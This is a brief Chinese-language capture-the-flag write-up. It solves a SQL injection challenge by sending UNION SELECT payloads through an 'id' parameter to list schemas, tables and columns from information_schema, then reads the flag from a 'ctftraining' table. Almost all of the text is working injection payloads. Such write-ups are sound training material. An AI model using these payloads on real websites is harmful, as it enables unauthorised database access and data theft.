开启环境:
?
?直接提示了查询语句,sql注入:
?id=1)))))) union select 1,group_concat(schema_name) from information_schema.schemata–-+
得到数据库
??id=1))))))union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘ctftraining’--+
得到ctftraining中的表
??id=1))))))union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘ctftraining’--+
爆出字段名
/?id=1))))))union select 1,flag from ctftraining.flag--+
联合查询得到flag值
?